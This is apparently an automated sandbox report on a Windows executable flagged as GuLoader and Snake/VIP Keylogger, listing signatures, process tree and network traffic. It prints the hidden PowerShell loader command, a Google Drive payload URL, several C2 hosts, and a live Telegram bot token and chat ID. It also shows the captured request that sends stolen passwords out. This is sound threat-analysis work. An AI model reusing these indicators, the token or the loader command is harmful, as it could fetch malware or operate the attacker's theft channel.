Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
66776676676.exe

Overview

General Information

Sample name:66776676676.exe
Analysis ID:1578053
MD5:a30468384472782c5b2fc6a439f641bb
SHA1:2695582dda03035b463e939b1a2577505e9a2766
SHA256:cee3ae54c0f49335db69551733260a6e0bb7f72089b126b14a09d44722bbdc8f
Tags:exeuser-threatcat_ch
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 66776676676.exe (PID: 736 cmdline: "C:\Users\user\Desktop\66776676676.exe" MD5: A30468384472782C5B2FC6A439F641BB)
    • powershell.exe (PID: 1448 cmdline: powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 2720 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg", "Chat_id": "5434550993", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000001.00000002.2439189486.000000000A1E1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 216.58.208.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2720, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49797
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) ", CommandLine: powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\66776676676.exe", ParentImage: C:\Users\user\Desktop\66776676676.exe, ParentProcessId: 736, ParentProcessName: 66776676676.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Eurylaimoid=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Southernise233.Bul';$Mistillidens63=$Eurylaimoid.SubString(10394,3);.$Mistillidens63($Eurylaimoid) ", ProcessId: 1448, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T08:19:40.133637+010028033053Unknown Traffic192.168.2.449831172.67.177.134443TCP
            2024-12-19T08:19:43.022710+010028033053Unknown Traffic192.168.2.449843172.67.177.134443TCP
            2024-12-19T08:19:45.902409+010028033053Unknown Traffic192.168.2.449850172.67.177.134443TCP
            2024-12-19T08:19:54.666017+010028033053Unknown Traffic192.168.2.449876172.67.177.134443TCP
            2024-12-19T08:19:57.551048+010028033053Unknown Traffic192.168.2.449883172.67.177.134443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T08:19:35.844427+010028032742Potentially Bad Traffic192.168.2.449820193.122.130.080TCP
            2024-12-19T08:19:38.266331+010028032742Potentially Bad Traffic192.168.2.449820193.122.130.080TCP
            2024-12-19T08:19:41.407147+010028032742Potentially Bad Traffic192.168.2.449837193.122.130.080TCP
            2024-12-19T08:19:44.297581+010028032742Potentially Bad Traffic192.168.2.449845193.122.130.080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T08:19:27.822396+010028032702Potentially Bad Traffic192.168.2.449797216.58.208.238443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg", "Chat_id": "5434550993", "Version": "4.4"}
            Source: msiexec.exe.2720.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendMessage"}
            Source: 66776676676.exeReversingLabs: Detection: 39%
            Source: 66776676676.exeVirustotal: Detection: 36%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 80.6% probability
            Source: 66776676676.exeJoe Sandbox ML: detected

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: 66776676676.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49825 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.4:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49806 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49897 version: TLS 1.2
            Source: 66776676676.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: stem.Core.pdb source: powershell.exe, 00000001.00000002.2434001169.0000000007A59000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbb source: powershell.exe, 00000001.00000002.2437586696.0000000008B53000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2437586696.0000000008B53000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_00406167 FindFirstFileA,FindClose,0_2_00406167
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405705
            Source: C:\Users\user\Desktop\66776676676.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0272F45Dh6_2_0272F2C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0272F45Dh6_2_0272F4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0272FC19h6_2_0272F970

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2020/12/2024%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendDocument?chat_id=5434550993&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2148b155d302Host: api.telegram.orgContent-Length: 581
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49820 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49837 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49845 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49831 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49843 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49797 -> 216.58.208.238:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49876 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49883 -> 172.67.177.134:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49850 -> 172.67.177.134:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49825 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2020/12/2024%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendDocument?chat_id=5434550993&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2148b155d302Host: api.telegram.orgContent-Length: 581
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 19 Dec 2024 07:20:02 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: 66776676676.exe, 66776676676.exe, 00000000.00000002.1733485828.0000000000409000.00000004.00000001.01000000.00000003.sdmp, 66776676676.exe, 00000000.00000000.1723187751.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: 66776676676.exe, 00000000.00000002.1733485828.0000000000409000.00000004.00000001.01000000.00000003.sdmp, 66776676676.exe, 00000000.00000000.1723187751.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000001.00000002.2425707404.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.2434001169.0000000007A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
            Source: powershell.exe, 00000001.00000002.2425707404.00000000051A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a
            Source: msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendDocument?chat_id=5434
            Source: msiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000006.00000002.2994091106.0000000025170000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000025161000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000006.00000002.2980289658.000000000961A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000006.00000002.2980289658.000000000961A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE
            Source: msiexec.exe, 00000006.00000002.2980289658.000000000968F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2980289658.000000000968F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE&export=download
            Source: msiexec.exe, 00000006.00000002.2980289658.000000000961A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=14F3atjryFesAeRWp7pE4bRHQnpfa95nE&export=download)J
            Source: powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
